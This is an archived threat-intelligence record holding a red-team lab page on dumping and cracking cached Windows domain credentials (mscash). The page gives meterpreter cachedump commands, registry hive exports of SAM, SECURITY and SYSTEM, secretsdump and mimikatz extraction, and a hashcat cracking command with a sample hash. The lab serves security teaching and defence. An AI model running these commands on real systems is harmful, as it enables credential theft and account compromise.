{ "id": "5267afce-6fdb-4568-86fd-0c1361290f25", "created_at": "2026-04-06T03:36:10.229383Z", "updated_at": "2026-04-10T13:12:04.012693Z", "deleted_at": null, "sha1_hash": "f55c770e59eb03e99f7aa2c85368fc7382aa994b", "title": "Dumping and Cracking mscash - Cached Domain Credentials | Red Team Notes", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 52726, "plain_text": "Dumping and Cracking mscash - Cached Domain Credentials |\r\nRed Team Notes\r\nPublished: 2019-03-12 · Archived: 2026-04-06 02:51:19 UTC\r\n⌘Ctrlk\r\n1. offensive security\r\n2. Credential Access \u0026 Dumping\r\nDumping and Cracking mscash - Cached Domain Credentials\r\nThis lab focuses on dumping and cracking mscash hashes after SYSTEM level privileges has been obtained on a\r\ncompromised machine.\r\nMscash is a Microsoft hashing algorithm that is used for storing cached domain credentials locally on a system\r\nafter a successful logon. It's worth noting that cached credentials do not expire. Domain credentials are cached on\r\na local system so that domain members can logon to the machine even if the DC is down. It's worth noting that\r\nmscash hash is not passable - i.e PTH attacks will not work.\r\nNote that in meterpreter session, hashdump only dumps the local SAM account hashes:\r\nhashdump\r\nTo dump cached domain credentials in mscash format, use a post exploitation module cachedump :\r\ngetuid\r\ngetsystem\r\nuse post/windows/gather/cachedump\r\nrun\r\nImpacket's secrestdump tool allows us to dump all the credentials that are stored in registry hives SAM,\r\nSECURITY and SYSTEM, so firstly, we need to write those out:\r\nhttps://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials\r\nPage 1 of 2\n\nreg.exe save hklm\\sam c:\\temp\\sam.save\r\nreg.exe save hklm\\security c:\\temp\\security.save\r\nreg.exe save hklm\\system c:\\temp\\system.save\r\nOnce the hives are retrieved, they can can be pulled back to kali linux to extract the hashes:\r\nsecretsdump.py -sam sam.save -security security.save -system system.save LOCAL\r\nlsadump::cache\r\nTo crack mscache with hashcat, it should be in the following format:\r\n$DCC2$10240#username#hash\r\nMeterpreter's cachedump module's output cannot be used in hashcat directly, but it's easy to do it.\r\nBelow shows the original output format from cachedump and the format accepted by hashcat:\r\necho ; cat hashes.txt ; echo ; cut -d \":\" -f 2 hashes.txt\r\nLet's try cracking it with hashchat now:\r\nhashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --p\r\nThis can be seen via regedit (running with SYSTEM privileges) in the following key:\r\nHKEY_LOCAL_MACHINE\\SECURITY\\Cache\r\nNL$1..10 are the cached hashes for 10 previously logged users:\r\nBy nulling out the Data fields one could remove the credentials from cache. Once cached credentials are removed,\r\nif no DC is present, a user trying to authenticate to the system will see:\r\nLast updated 7 years ago\r\nThis site uses cookies to deliver its service and to analyze traffic. By browsing this site, you accept the privacy\r\npolicy.\r\nSource: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentia\r\nls\r\nhttps://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials\r\nPage 2 of 2", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials" ], "report_names": [ "dumping-and-cracking-mscash-cached-domain-credentials" ], "threat_actors": [], "ts_created_at": 1775446570, "ts_updated_at": 1775826724, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f55c770e59eb03e99f7aa2c85368fc7382aa994b.pdf", "text": "https://archive.orkl.eu/f55c770e59eb03e99f7aa2c85368fc7382aa994b.txt", "img": "https://archive.orkl.eu/f55c770e59eb03e99f7aa2c85368fc7382aa994b.jpg" } }